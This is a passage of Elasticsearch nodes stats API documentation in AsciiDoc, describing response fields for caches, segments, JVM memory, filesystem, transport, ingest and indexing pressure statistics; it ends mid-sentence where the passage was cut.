- -`refresh`:: -(object) -Contains statistics about refresh operations for the node. -+ -.Properties of `refresh` -[%collapsible%open] -======= -`total`:: -(integer) -Total number of refresh operations. - -`total_time`:: -(<>) -Total time spent performing refresh operations. - -`total_time_in_millis`:: -(integer) -Total time in milliseconds -spent performing refresh operations. - -`external_total`:: -(integer) -Total number of external refresh operations. - -`external_total_time`:: -(<>) -Total time spent performing external operations. - -`external_total_time_in_millis`:: -(integer) -Total time in milliseconds -spent performing external operations. - -`listeners`:: -(integer) -Number of refresh listeners. -======= - -`flush`:: -(object) -Contains statistics about flush operations for the node. 
-+ -.Properties of `flush` -[%collapsible%open] -======= -`total`:: -(integer) -Number of flush operations. - -`periodic`:: -(integer) -Number of flush periodic operations. - -`total_time`:: -(<>) -Total time spent performing flush operations. - -`total_time_in_millis`:: -(integer) -Total time in milliseconds -spent performing flush operations. -======= - -`warmer`:: -(object) -Contains statistics about index warming operations for the node. -+ -.Properties of `warmer` -[%collapsible%open] -======= -`current`:: -(integer) -Number of active index warmers. - -`total`:: -(integer) -Total number of index warmers. - -`total_time`:: -(<>) -Total time spent performing index warming operations. - -`total_time_in_millis`:: -(integer) -Total time in milliseconds -spent performing index warming operations. -======= - -`query_cache`:: -(object) -Contains statistics about the query cache across all shards assigned to the -node. -+ -.Properties of `query_cache` -[%collapsible%open] -======= -`memory_size`:: -(<>) -Total amount of memory used for the query cache across all shards assigned to -the node. - -`memory_size_in_bytes`:: -(integer) -Total amount of memory, in bytes, used for the query cache across all shards -assigned to the node. - -`total_count`:: -(integer) -Total count of hits, misses, and cached queries -in the query cache. - -`hit_count`:: -(integer) -Number of query cache hits. - -`miss_count`:: -(integer) -Number of query cache misses. - -`cache_size`:: -(integer) -Size, in bytes, of the query cache. - -`cache_count`:: -(integer) -Count of queries -in the query cache. - -`evictions`:: -(integer) -Number of query cache evictions. -======= - -`fielddata`:: -(object) -Contains statistics about the field data cache across all shards -assigned to the node. -+ -.Properties of `fielddata` -[%collapsible%open] -======= -`memory_size`:: -(<>) -Total amount of memory used for the field data cache across all shards -assigned to the node. - -`memory_size_in_bytes`:: -(integer) -Total amount of memory, in bytes, used for the field data cache across all -shards assigned to the node. - -`evictions`:: -(integer) -Number of fielddata evictions. -======= - -`completion`:: -(object) -Contains statistics about completions across all shards assigned to the node. -+ -.Properties of `completion` -[%collapsible%open] -======= -`size`:: -(<>) -Total amount of memory used for completion across all shards assigned to -the node. - -`size_in_bytes`:: -(integer) -Total amount of memory, in bytes, used for completion across all shards assigned -to the node. -======= - -`segments`:: -(object) -Contains statistics about segments across all shards assigned to the node. -+ -.Properties of `segments` -[%collapsible%open] -======= -`count`:: -(integer) -Number of segments. - -`memory`:: -(<>) -Total amount of memory used for segments across all shards assigned to the -node. - -`memory_in_bytes`:: -(integer) -Total amount of memory, in bytes, used for segments across all shards assigned -to the node. - -`terms_memory`:: -(<>) -Total amount of memory used for terms across all shards assigned to the node. - -`terms_memory_in_bytes`:: -(integer) -Total amount of memory, in bytes, used for terms across all shards assigned to -the node. - -`stored_fields_memory`:: -(<>) -Total amount of memory used for stored fields across all shards assigned to -the node. - -`stored_fields_memory_in_bytes`:: -(integer) -Total amount of memory, in bytes, used for stored fields across all shards -assigned to the node. 
- -`term_vectors_memory`:: -(<>) -Total amount of memory used for term vectors across all shards assigned to -the node. - -`term_vectors_memory_in_bytes`:: -(integer) -Total amount of memory, in bytes, used for term vectors across all shards -assigned to the node. - -`norms_memory`:: -(<>) -Total amount of memory used for normalization factors across all shards assigned -to the node. - -`norms_memory_in_bytes`:: -(integer) -Total amount of memory, in bytes, used for normalization factors across all -shards assigned to the node. - -`points_memory`:: -(<>) -Total amount of memory used for points across all shards assigned to the node. - -`points_memory_in_bytes`:: -(integer) -Total amount of memory, in bytes, used for points across all shards assigned to -the node. - -`doc_values_memory`:: -(<>) -Total amount of memory used for doc values across all shards assigned to -the node. - -`doc_values_memory_in_bytes`:: -(integer) -Total amount of memory, in bytes, used for doc values across all shards assigned -to the node. - -`index_writer_memory`:: -(<>) -Total amount of memory used by all index writers across all shards assigned to -the node. - -`index_writer_memory_in_bytes`:: -(integer) -Total amount of memory, in bytes, used by all index writers across all shards -assigned to the node. - -`version_map_memory`:: -(<>) -Total amount of memory used by all version maps across all shards assigned to -the node. - -`version_map_memory_in_bytes`:: -(integer) -Total amount of memory, in bytes, used by all version maps across all shards -assigned to the node. - -`fixed_bit_set`:: -(<>) -Total amount of memory used by fixed bit sets across all shards assigned to -the node. -+ -Fixed bit sets are used for nested object field types and -type filters for <> fields. - -`fixed_bit_set_memory_in_bytes`:: -(integer) -Total amount of memory, in bytes, used by fixed bit sets across all shards -assigned to the node. -+ -Fixed bit sets are used for nested object field types and -type filters for <> fields. - -`max_unsafe_auto_id_timestamp`:: -(integer) -Time of the most recently retried indexing request. Recorded in milliseconds -since the {wikipedia}/Unix_time[Unix Epoch]. - -`file_sizes`:: -(object) -Contains statistics about the size of the segment file. -+ -.Properties of `file_sizes` -[%collapsible%open] -======== -`size`:: -(<>) -Size of the segment file. - -`size_in_bytes`:: -(integer) -Size, in bytes, -of the segment file. - -`description`:: -(string) -Description of the segment file. -======== -======= - -`translog`:: -(object) -Contains statistics about transaction log operations for the node. -+ -.Properties of `translog` -[%collapsible%open] -======= -`operations`:: -(integer) -Number of transaction log operations. - -`size`:: -(<>) -Size of the transaction log. - -`size_in_bytes`:: -(integer) -Size, in bytes, of the transaction log. - -`uncommitted_operations`:: -(integer) -Number of uncommitted transaction log operations. - -`uncommitted_size`:: -(<>) -Size of uncommitted transaction log operations. - -`uncommitted_size_in_bytes`:: -(integer) -Size, in bytes, of uncommitted transaction log operations. - -`earliest_last_modified_age`:: -(integer) -Earliest last modified age -for the transaction log. -======= - -`request_cache`:: -(object) -Contains statistics about the request cache across all shards assigned to the -node. -+ -.Properties of `request_cache` -[%collapsible%open] -======= -`memory_size`:: -(<>) -Memory used by the request cache. 
- -`memory_size_in_bytes`:: -(integer) -Memory, in bytes, used by the request cache. - -`evictions`:: -(integer) -Number of request cache operations. - -`hit_count`:: -(integer) -Number of request cache hits. - -`miss_count`:: -(integer) -Number of request cache misses. -======= - -`recovery`:: -(object) -Contains statistics about recovery operations for the node. -+ -.Properties of `recovery` -[%collapsible%open] -======= -`current_as_source`:: -(integer) -Number of recoveries -that used an index shard as a source. - -`current_as_target`:: -(integer) -Number of recoveries -that used an index shard as a target. - -`throttle_time`:: -(<>) -Time by which recovery operations were delayed due to throttling. - -`throttle_time_in_millis`:: -(integer) -Time in milliseconds -recovery operations were delayed due to throttling. -======= -====== - -[[cluster-nodes-stats-api-response-body-os]] -`os`:: -(object) -Contains statistics about the operating system for the node. -+ -.Properties of `os` -[%collapsible%open] -====== -`timestamp`:: -(integer) -Last time the operating system statistics were refreshed. Recorded in -milliseconds since the {wikipedia}/Unix_time[Unix Epoch]. - -`cpu`:: -(object) -Contains statistics about CPU usage for the node. -+ -.Properties of `cpu` -[%collapsible%open] -======= -`percent`:: -(integer) -Recent CPU usage for the whole system, or `-1` if not supported. - -`load_average`:: -(object) -Contains statistics about load averages on the system. -+ -.Properties of `load_average` -[%collapsible%open] -======== -`1m`:: -(float) -One-minute load average on the system (field is not present if one-minute load -average is not available). - -`5m`:: -(float) -Five-minute load average on the system (field is not present if five-minute load -average is not available). - -`15m`:: -(float) -Fifteen-minute load average on the system (field is not present if -fifteen-minute load average is not available). -======== -======= - -`mem`:: -(object) -Contains statistics about memory usage for the node. -+ -.Properties of `mem` -[%collapsible%open] -======= -`total`:: -(<>) -Total amount of physical memory. - -`total_in_bytes`:: -(integer) -Total amount of physical memory in bytes. - -`free`:: -(<>) -Amount of free physical memory. - -`free_in_bytes`:: -(integer) -Amount of free physical memory in bytes. - -`used`:: -(<>) -Amount of used physical memory. - -`used_in_bytes`:: -(integer) -Amount of used physical memory in bytes. - -`free_percent`:: -(integer) -Percentage of free memory. - -`used_percent`:: -(integer) -Percentage of used memory. -======= - -`swap`:: -(object) -Contains statistics about swap space for the node. -+ -.Properties of `swap` -[%collapsible%open] -======= -`total`:: -(<>) -Total amount of swap space. - -`total_in_bytes`:: -(integer) -Total amount of swap space in bytes. - -`free`:: -(<>) -Amount of free swap space. - -`free_in_bytes`:: -(integer) -Amount of free swap space in bytes. - -`used`:: -(<>) -Amount of used swap space. - -`used_in_bytes`:: -(integer) -Amount of used swap space in bytes. -======= - -`cgroup` (Linux only):: -(object) -Contains cgroup statistics for the node. -+ -NOTE: For the cgroup stats to be visible, cgroups must be compiled into the -kernel, the `cpu` and `cpuacct` cgroup subsystems must be configured and stats -must be readable from `/sys/fs/cgroup/cpu` and `/sys/fs/cgroup/cpuacct`. -+ -.Properties of `cgroup` -[%collapsible%open] -======= - -`cpuacct` (Linux only):: -(object) -Contains statistics about `cpuacct` control group for the node. 
-+ -.Properties of `cpuacct` -[%collapsible%open] -======== -`control_group` (Linux only):: -(string) -The `cpuacct` control group to which the {es} process belongs. - -`usage_nanos` (Linux only):: -(integer) -The total CPU time (in nanoseconds) consumed by all tasks in the same cgroup -as the {es} process. -======== - -`cpu` (Linux only):: -(object) -Contains statistics about `cpu` control group for the node. -+ -.Properties of `cpu` -[%collapsible%open] -======== -`control_group` (Linux only):: -(string) -The `cpu` control group to which the {es} process belongs. - -`cfs_period_micros` (Linux only):: -(integer) -The period of time (in microseconds) for how regularly all tasks in the same -cgroup as the {es} process should have their access to CPU resources -reallocated. - -`cfs_quota_micros` (Linux only):: -(integer) -The total amount of time (in microseconds) for which all tasks in -the same cgroup as the {es} process can run during one period -`cfs_period_micros`. - -`stat` (Linux only):: -(object) -Contains CPU statistics for the node. -+ -.Properties of `stat` -[%collapsible%open] -========= -`number_of_elapsed_periods` (Linux only):: -(integer) -The number of reporting periods (as specified by -`cfs_period_micros`) that have elapsed. - -`number_of_times_throttled` (Linux only):: -(integer) -The number of times all tasks in the same cgroup as the {es} process have -been throttled. - -`time_throttled_nanos` (Linux only):: -(integer) -The total amount of time (in nanoseconds) for which all tasks in the same -cgroup as the {es} process have been throttled. -========= -======== - -`memory` (Linux only):: -(object) -Contains statistics about the `memory` control group for the node. -+ -.Properties of `memory` -[%collapsible%open] -======== -`control_group` (Linux only):: -(string) -The `memory` control group to which the {es} process belongs. - -`limit_in_bytes` (Linux only):: -(string) -The maximum amount of user memory (including file cache) allowed for all -tasks in the same cgroup as the {es} process. This value can be too big to -store in a `long`, so is returned as a string so that the value returned can -exactly match what the underlying operating system interface returns. Any -value that is too large to parse into a `long` almost certainly means no -limit has been set for the cgroup. - -`usage_in_bytes` (Linux only):: -(string) -The total current memory usage by processes in the cgroup (in bytes) by all -tasks in the same cgroup as the {es} process. This value is stored as a -string for consistency with `limit_in_bytes`. -======== -======= -====== - -[[cluster-nodes-stats-api-response-body-process]] -`process`:: -(object) -Contains process statistics for the node. -+ -.Properties of `process` -[%collapsible%open] -====== -`timestamp`:: -(integer) -Last time the statistics were refreshed. Recorded in milliseconds -since the {wikipedia}/Unix_time[Unix Epoch]. - -`open_file_descriptors`:: -(integer) -Number of opened file descriptors associated with the current or -`-1` if not supported. - -`max_file_descriptors`:: -(integer) -Maximum number of file descriptors allowed on the system, or `-1` if not -supported. - -`cpu`:: -(object) -Contains CPU statistics for the node. -+ -.Properties of `cpu` -[%collapsible%open] -======= -`percent`:: -(integer) -CPU usage in percent, or `-1` if not known at the time the stats are -computed. - -`total`:: -(<>) -CPU time used by the process on which the Java virtual machine is running. 
- -`total_in_millis`:: -(integer) -CPU time (in milliseconds) used by the process on which the Java virtual -machine is running, or `-1` if not supported. -======= - -`mem`:: -(object) -Contains virtual memory statistics for the node. -+ -.Properties of `mem` -[%collapsible%open] -======= -`total_virtual`:: -(<>) -Size of virtual memory that is guaranteed to be available to the -running process. - -`total_virtual_in_bytes`:: -(integer) -Size in bytes of virtual memory that is guaranteed to be available to the -running process. -======= -====== - -[[cluster-nodes-stats-api-response-body-jvm]] -`jvm`:: -(object) -Contains Java Virtual Machine (JVM) statistics for the node. -+ -.Properties of `jvm` -[%collapsible%open] -====== -`timestamp`:: -(integer) -Last time JVM statistics were refreshed. - -`uptime`:: -(<>) -JVM uptime. - -`uptime_in_millis`:: -(integer) -JVM uptime in milliseconds. - -`mem`:: -(object) -Contains JVM memory usage statistics for the node. -+ -.Properties of `mem` -[%collapsible%open] -======= -`heap_used`:: -(<>) -Memory currently in use by the heap. - -`heap_used_in_bytes`:: -(integer) -Memory, in bytes, currently in use by the heap. - -`heap_used_percent`:: -(integer) -Percentage of memory currently in use by the heap. - -`heap_committed`:: -(<>) -Amount of memory available for use by the heap. - -`heap_committed_in_bytes`:: -(integer) -Amount of memory, in bytes, available for use by the heap. - -`heap_max`:: -(<>) -Maximum amount of memory available for use by the heap. - -`heap_max_in_bytes`:: -(integer) -Maximum amount of memory, in bytes, available for use by the heap. - -`non_heap_used`:: -(<>) -Non-heap memory used. - -`non_heap_used_in_bytes`:: -(integer) -Non-heap memory used, in bytes. - -`non_heap_committed`:: -(<>) -Amount of non-heap memory available. - -`non_heap_committed_in_bytes`:: -(integer) -Amount of non-heap memory available, in bytes. - -`pools`:: -(object) -Contains statistics about heap memory usage for the node. -+ -.Properties of `pools` -[%collapsible%open] -======== - -`young`:: -(object) -Contains statistics about memory usage by the young generation heap for the -node. -+ -.Properties of `young` -[%collapsible%open] -========= -`used`:: -(<>) -Memory used by the young generation heap. - -`used_in_bytes`:: -(integer) -Memory, in bytes, used by the young generation heap. - -`max`:: -(<>) -Maximum amount of memory available for use by the young generation heap. - -`max_in_bytes`:: -(integer) -Maximum amount of memory, in bytes, available for use by the young generation -heap. - -`peak_used`:: -(<>) -Largest amount of memory historically used by the young generation heap. - -`peak_used_in_bytes`:: -(integer) -Largest amount of memory, in bytes, historically used by the young generation -heap. - -`peak_max`:: -(<>) -Largest amount of memory historically used by the young generation heap. - -`peak_max_in_bytes`:: -(integer) -Largest amount of memory, in bytes, historically used by the young generation -heap. -========= - -`survivor`:: -(object) -Contains statistics about memory usage by the survivor space for the node. -+ -.Properties of `survivor` -[%collapsible%open] -========= -`used`:: -(<>) -Memory used by the survivor space. - -`used_in_bytes`:: -(integer) -Memory, in bytes, used by the survivor space. - -`max`:: -(<>) -Maximum amount of memory available for use by the survivor space. - -`max_in_bytes`:: -(integer) -Maximum amount of memory, in bytes, available for use by the survivor space. 
- -`peak_used`:: -(<>) -Largest amount of memory historically used by the survivor space. - -`peak_used_in_bytes`:: -(integer) -Largest amount of memory, in bytes, historically used by the survivor space. - -`peak_max`:: -(<>) -Largest amount of memory historically used by the survivor space. - -`peak_max_in_bytes`:: -(integer) -Largest amount of memory, in bytes, historically used by the survivor space. -========= - -`old`:: -(object) -Contains statistics about memory usage by the old generation heap for the node. -+ -.Properties of `old` -[%collapsible%open] -========= -`used`:: -(<>) -Memory used by the old generation heap. - -`used_in_bytes`:: -(integer) -Memory, in bytes, used by the old generation heap. - -`max`:: -(<>) -Maximum amount of memory available for use by the old generation heap. - -`max_in_bytes`:: -(integer) -Maximum amount of memory, in bytes, available for use by the old generation -heap. - -`peak_used`:: -(<>) -Largest amount of memory historically used by the old generation heap. - -`peak_used_in_bytes`:: -(integer) -Largest amount of memory, in bytes, historically used by the old generation -heap. - -`peak_max`:: -(<>) -Highest memory limit historically available for use by the old generation heap. - -`peak_max_in_bytes`:: -(integer) -Highest memory limit, in bytes, historically available for use by the old -generation heap. -========= -======== -======= - -`threads`:: -(object) -Contains statistics about JVM thread usage for the node. -+ -.Properties of `threads` -[%collapsible%open] -======= -`count`:: -(integer) -Number of active threads in use by JVM. - -`peak_count`:: -(integer) -Highest number of threads used by JVM. -======= - -`gc`:: -(object) -Contains statistics about JVM garbage collectors for the node. -+ -.Properties of `gc` -[%collapsible%open] -======= -`collectors`:: -(object) -Contains statistics about JVM garbage collectors for the node. -+ -.Properties of `collectors` -[%collapsible%open] -======== -`young`:: -(object) -Contains statistics about JVM garbage collectors that collect young generation -objects for the node. -+ -.Properties of `young` -[%collapsible%open] -========= -`collection_count`:: -(integer) -Number of JVM garbage collectors that collect young generation objects. - -`collection_time`:: -(<>) -Total time spent by JVM collecting young generation objects. - -`collection_time_in_millis`:: -(integer) -Total time in milliseconds spent by JVM collecting young generation objects. -========= - -`old`:: -(object) -Contains statistics about JVM garbage collectors that collect old generation -objects for the node. -+ -.Properties of `old` -[%collapsible%open] -========= -`collection_count`:: -(integer) -Number of JVM garbage collectors that collect old generation objects. - -`collection_time`:: -(<>) -Total time spent by JVM collecting old generation objects. - -`collection_time_in_millis`:: -(integer) -Total time in milliseconds spent by JVM collecting old generation objects. -========= -======== -======= - -`buffer_pools`:: -(object) -Contains statistics about JVM buffer pools for the node. -+ -.Properties of `buffer_pools` -[%collapsible%open] -======= -`mapped`:: -(object) -Contains statistics about mapped JVM buffer pools for the node. -+ -.Properties of `mapped` -[%collapsible%open] -======== -`count`:: -(integer) -Number of mapped buffer pools. - -`used`:: -(<>) -Size of mapped buffer pools. - -`used_in_bytes`:: -(integer) -Size, in bytes, of mapped buffer pools. - -`total_capacity`:: -(<>) -Total capacity of mapped buffer pools. 
- -`total_capacity_in_bytes`:: -(integer) -Total capacity, in bytes, of mapped buffer pools. -======== - -`direct`:: -(object) -Contains statistics about direct JVM buffer pools for the node. -+ -.Properties of `direct` -[%collapsible%open] -======== -`count`:: -(integer) -Number of direct buffer pools. - -`used`:: -(<>) -Size of direct buffer pools. - -`used_in_bytes`:: -(integer) -Size, in bytes, of direct buffer pools. - -`total_capacity`:: -(<>) -Total capacity of direct buffer pools. - -`total_capacity_in_bytes`:: -(integer) -Total capacity, in bytes, of direct buffer pools. -======== -======= - -`classes`:: -(object) -Contains statistics about classes loaded by JVM for the node. -+ -.Properties of `classes` -[%collapsible%open] -======= -`current_loaded_count`:: -(integer) -Number of classes currently loaded by JVM. - -`total_loaded_count`:: -(integer) -Total number of classes loaded since the JVM started. - -`total_unloaded_count`:: -(integer) -Total number of classes unloaded since the JVM started. -======= -====== - -[[cluster-nodes-stats-api-response-body-threadpool]] -`thread_pool`:: -(object) -Contains thread pool statistics for the node -+ -.Properties of `thread_pool` -[%collapsible%open] -====== -``:: -(object) -Contains statistics about the thread pool for the node. -+ -.Properties of `` -[%collapsible%open] -======= -`threads`:: -(integer) -Number of threads in the thread pool. - -`queue`:: -(integer) -Number of tasks in queue for the thread pool. - -`active`:: -(integer) -Number of active threads in the thread pool. - -`rejected`:: -(integer) -Number of tasks rejected by the thread pool executor. - -`largest`:: -(integer) -Highest number of active threads in the thread pool. - -`completed`:: -(integer) -Number of tasks completed by the thread pool executor. -======= -====== - -[[cluster-nodes-stats-api-response-body-fs]] -`fs`:: -(object) -Contains file store statistics for the node. -+ -.Properties of `fs` -[%collapsible%open] -====== -`timestamp`:: -(integer) -Last time the file stores statistics were refreshed. Recorded in -milliseconds since the {wikipedia}/Unix_time[Unix Epoch]. - -`total`:: -(object) -Contains statistics for all file stores of the node. -+ -.Properties of `total` -[%collapsible%open] -======= -`total`:: -(<>) -Total size of all file stores. - -`total_in_bytes`:: -(integer) -Total size (in bytes) of all file stores. - -`free`:: -(<>) -Total unallocated disk space in all file stores. - -`free_in_bytes`:: -(integer) -Total number of unallocated bytes in all file stores. - -`available`:: -(<>) -Total disk space available to this Java virtual machine on all file -stores. Depending on OS or process level restrictions, this might appear -less than `free`. This is the actual amount of free disk -space the {es} node can utilise. - -`available_in_bytes`:: -(integer) -Total number of bytes available to this Java virtual machine on all file -stores. Depending on OS or process level restrictions, this might appear -less than `free_in_bytes`. This is the actual amount of free disk -space the {es} node can utilise. -======= - -[[cluster-nodes-stats-fs-data]] -`data`:: -(array of objects) -List of all file stores. -+ -.Properties of `data` -[%collapsible%open] -======= -`path`:: -(string) -Path to the file store. - -`mount`:: -(string) -Mount point of the file store (ex: /dev/sda2). - -`type`:: -(string) -Type of the file store (ex: ext4). - -`total`:: -(<>) -Total size of the file store. - -`total_in_bytes`:: -(integer) -Total size (in bytes) of the file store. 
- -`free`:: -(<>) -Total amount of unallocated disk space in the file store. - -`free_in_bytes`:: -(integer) -Total number of unallocated bytes in the file store. - -`available`:: -(<>) -Total amount of disk space available to this Java virtual machine on this file -store. - -`available_in_bytes`:: -(integer) -Total number of bytes available to this Java virtual machine on this file -store. -======= - -`io_stats` (Linux only):: -(objects) -Contains I/O statistics for the node. -+ -.Properties of `io_stats` -[%collapsible%open] -======= -`devices` (Linux only):: -(array) -Array of disk metrics for each device that is backing an {es} data path. -These disk metrics are probed periodically and averages between the last -probe and the current probe are computed. -+ -.Properties of `devices` -[%collapsible%open] -======== -`device_name` (Linux only):: -(string) -The Linux device name. - -`operations` (Linux only):: -(integer) -The total number of read and write operations for the device completed since -starting {es}. - -`read_operations` (Linux only):: -(integer) -The total number of read operations for the device completed since starting -{es}. - -`write_operations` (Linux only):: -(integer) -The total number of write operations for the device completed since starting -{es}. - -`read_kilobytes` (Linux only):: -(integer) -The total number of kilobytes read for the device since starting {es}. - -`write_kilobytes` (Linux only):: -(integer) -The total number of kilobytes written for the device since starting {es}. -======== - -`operations` (Linux only):: - (integer) - The total number of read and write operations across all devices used by - {es} completed since starting {es}. - -`read_operations` (Linux only):: - (integer) - The total number of read operations for across all devices used by {es} - completed since starting {es}. - -`write_operations` (Linux only):: - (integer) - The total number of write operations across all devices used by {es} - completed since starting {es}. - -`read_kilobytes` (Linux only):: - (integer) - The total number of kilobytes read across all devices used by {es} since - starting {es}. - -`write_kilobytes` (Linux only):: - (integer) - The total number of kilobytes written across all devices used by {es} since - starting {es}. -======= -====== - -[[cluster-nodes-stats-api-response-body-transport]] -`transport`:: -(object) -Contains transport statistics for the node. -+ -.Properties of `transport` -[%collapsible%open] -====== -`server_open`:: -(integer) -Current number of inbound TCP connections used for internal communication between nodes. - -`total_outbound_connections`:: -(integer) -The cumulative number of outbound transport connections that this node has -opened since it started. Each transport connection may comprise multiple TCP -connections but is only counted once in this statistic. Transport connections -are typically <> so this statistic should -remain constant in a stable cluster. - -`rx_count`:: -(integer) -Total number of RX (receive) packets received by the node during internal -cluster communication. - -`rx_size`:: -(<>) -Size of RX packets received by the node during internal cluster communication. - -`rx_size_in_bytes`:: -(integer) -Size, in bytes, of RX packets received by the node during internal cluster -communication. - -`tx_count`:: -(integer) -Total number of TX (transmit) packets sent by the node during internal cluster -communication. - -`tx_size`:: -(<>) -Size of TX packets sent by the node during internal cluster communication. 
- -`tx_size_in_bytes`:: -(integer) -Size, in bytes, of TX packets sent by the node during internal cluster -communication. -====== - -[[cluster-nodes-stats-api-response-body-http]] -`http`:: -(object) -Contains http statistics for the node. -+ -.Properties of `http` -[%collapsible%open] -====== -`current_open`:: -(integer) -Current number of open HTTP connections for the node. - -`total_opened`:: -(integer) -Total number of HTTP connections opened for the node. -====== - -[[cluster-nodes-stats-api-response-body-breakers]] -`breakers`:: -(object) -Contains circuit breaker statistics for the node. -+ -.Properties of `breakers` -[%collapsible%open] -====== -``:: -(object) -Contains statistics for the circuit breaker. -+ -.Properties of `` -[%collapsible%open] -======= -`limit_size_in_bytes`:: -(integer) -Memory limit, in bytes, for the circuit breaker. - -`limit_size`:: -(<>) -Memory limit for the circuit breaker. - -`estimated_size_in_bytes`:: -(integer) -Estimated memory used, in bytes, for the operation. - -`estimated_size`:: -(<>) -Estimated memory used for the operation. - -`overhead`:: -(float) -A constant that all estimates for the circuit breaker are multiplied with to -calculate a final estimate. - -`tripped`:: -(integer) -Total number of times the circuit breaker has been triggered and prevented an -out of memory error. -======= -====== - -[[cluster-nodes-stats-api-response-body-script]] -`script`:: -(object) -Contains script statistics for the node. -+ -.Properties of `script` -[%collapsible%open] -====== -`compilations`:: -(integer) -Total number of inline script compilations performed by the node. - -`cache_evictions`:: -(integer) -Total number of times the script cache has evicted old data. - -`compilation_limit_triggered`:: -(integer) -Total number of times the <> circuit breaker has limited inline script compilations. -====== - -[[cluster-nodes-stats-api-response-body-discovery]] -`discovery`:: -(object) -Contains node discovery statistics for the node. -+ -.Properties of `discovery` -[%collapsible%open] -====== -`cluster_state_queue`:: -(object) -Contains statistics for the cluster state queue of the node. -+ -.Properties of `cluster_state_queue` -[%collapsible%open] -======= -`total`:: -(integer) -Total number of cluster states in queue. - -`pending`:: -(integer) -Number of pending cluster states in queue. - -`committed`:: -(integer) -Number of committed cluster states in queue. -======= - -`published_cluster_states`:: -(object) -Contains statistics for the published cluster states of the node. -+ -.Properties of `published_cluster_states` -[%collapsible%open] -======= -`full_states`:: -(integer) -Number of published cluster states. - -`incompatible_diffs`:: -(integer) -Number of incompatible differences between published cluster states. - -`compatible_diffs`:: -(integer) -Number of compatible differences between published cluster states. -======= -====== - -[[cluster-nodes-stats-api-response-body-ingest]] -`ingest`:: -(object) -Contains ingest statistics for the node. -+ -.Properties of `ingest` -[%collapsible%open] -====== -`total`:: -(object) -Contains statistics about ingest operations for the node. -+ -.Properties of `total` -[%collapsible%open] -======= -`count`:: -(integer) -Total number of documents ingested during the lifetime of this node. - -`time`:: -(<>) -Total time spent preprocessing ingest documents during the lifetime of this -node. 
- -`time_in_millis`:: -(integer) -Total time, in milliseconds, spent preprocessing ingest documents during the -lifetime of this node. - -`current`:: -(integer) -Total number of documents currently being ingested. - -`failed`:: -(integer) -Total number of failed ingest operations during the lifetime of this node. -======= - -`pipelines`:: -(object) -Contains statistics about ingest pipelines for the node. -+ -.Properties of `pipelines` -[%collapsible%open] -======= -``:: -(object) -Contains statistics about the ingest pipeline. -+ -.Properties of `` -[%collapsible%open] -======== -`count`:: -(integer) -Number of documents preprocessed by the ingest pipeline. - -`time`:: -(<>) -Total time spent preprocessing documents in the ingest pipeline. - -`time_in_millis`:: -(integer) -Total time, in milliseconds, spent preprocessing documents in the ingest -pipeline. - -`failed`:: -(integer) -Total number of failed operations for the ingest pipeline. - -`processors`:: -(array of objects) -Contains statistics for the ingest processors for the ingest pipeline. -+ -.Properties of `processors` -[%collapsible%open] -========= -``:: -(object) -Contains statistics for the ingest processor. -+ -.Properties of `` -[%collapsible%open] -========== -`count`:: -(integer) -Number of documents transformed by the processor. - -`time`:: -(<>) -Time spent by the processor transforming documents. - -`time_in_millis`:: -(integer) -Time, in milliseconds, spent by the processor transforming documents. - -`current`:: -(integer) -Number of documents currently being transformed by the processor. - -`failed`:: -(integer) -Number of failed operations for the processor. -========== -========= -======== -======= -====== - -[[cluster-nodes-stats-api-response-body-indexing-pressure]] -`indexing_pressure`:: -(object) -Contains <> statistics for the node. -+ -.Properties of `indexing_pressure` -[%collapsible%open] -====== -`memory`:: -(object) -Contains statistics for memory consumption from indexing load. -+ -.Properties of `` -[%collapsible%open] -======= -`current`:: -(object) -Contains statistics for current indexing load. -+ -.Properties of `` -[%collapsible%open] -======== -`combined_coordinating_and_primary`:: -(<>) -Memory consumed by indexing requests in the coordinating or primary stage. This -value is not the sum of coordinating and primary as a node can reuse the -coordinating memory if the primary stage is executed locally. - -`combined_coordinating_and_primary_in_bytes`:: -(integer) -Memory consumed, in bytes, by indexing requests in the coordinating or primary -stage. This value is not the sum of coordinating and primary as a node can -reuse the coordinating memory if the primary stage is executed locally. - -`coordinating`:: -(<>) -Memory consumed by indexing requests in the coordinating stage. - -`coordinating_in_bytes`:: -(integer) -Memory consumed, in bytes, by indexing requests in the coordinating stage. - -`primary`:: -(<>) -Memory consumed by indexing requests in the primary stage. - -`primary_in_bytes`:: -(integer) -Memory consumed, in bytes, by indexing requests in the primary stage. - -`replica`:: -(<>) -Memory consumed by indexing requests in the replica stage. - -`replica_in_bytes`:: -(integer) -Memory consumed, in bytes, by indexing requests in the replica stage. - -`all`:: -(<>) -Memory consumed by indexing requests in the coordinating, primary, or replica stage. - -`all_in_bytes`:: -(integer) -Memory consumed, in bytes, by indexing requests in the coordinating, primary, -or replica stage. 
-======== -`total`:: -(object) -Contains statistics for the cumulative indexing load since the node started. -+ -.Properties of `` -[%collapsible%open] -======== -`combined_coordinating_and_primary`:: -(<>) -Memory consumed by indexing requests in the coordinating or primary stage. This -value is not the sum of coordinating and primary as a node can reuse the -coordinating memory if the primary stage is executed locally. - -`combined_coordinating_and_primary_in_bytes`:: -(integer) -Memory consumed, in bytes, by indexing requests in the coordinating or primary -stage. This value is not the sum of coordinating and primary as a node can -reuse the coordinating memory if the primary stage is executed locally. - -`coordinating`:: -(<>) -Memory consumed by indexing requests in the coordinating stage. - -`coordinating_in_bytes`:: -(integer) -Memory consumed, in bytes, by indexing requests in the coordinating stage. - -`primary`:: -(<>) -Memory consumed by indexing requests in the primary stage. - -`primary_in_bytes`:: -(integer) -Memory consumed, in bytes, by indexing requests in the primary stage. - -`replica`:: -(<>) -Memory consumed by indexing requests in the replica stage. - -`replica_in_bytes`:: -(integer) -Memory consumed, in bytes, by indexing requests in the replica stage. - -`all`:: -(<>) -Memory consumed by indexing requests in the coordinating, primary, or replica stage. - -`all_in_bytes`:: -(integer) -Memory consumed, in bytes, by indexing requests in the coordinating, primary, -or replica stage. - -`coordinating_rejections`:: -(integer) -Number of indexing requests rejected in the coordinating stage. - -`primary_rejections`:: -(integer) -Number of indexing requests rejected in the primary stage. - -`replica_rejections`:: -(integer) -Number of indexing requests rejected in the replica stage. -======== -`limit`:: -(<>) -Configured memory limit for the indexing requests. Replica requests have an -automatic limit that is 1.5x this value. - -`limit_in_bytes`:: -(integer) -Configured memory limit, in bytes, for the indexing requests. Replica requests -have an automatic limit that is 1.5x this value. -======= -====== - -[[cluster-nodes-stats-api-response-body-adaptive-selection]] -`adaptive_selection`:: -(object) -Contains adaptive selection statistics for the node. -+ -.Properties of `adaptive_selection` -[%collapsible%open] -====== -`outgoing_searches`:: -(integer) -The number of outstanding search requests from the node these stats are for -to the keyed node. - -`avg_queue_size`:: -(integer) -The 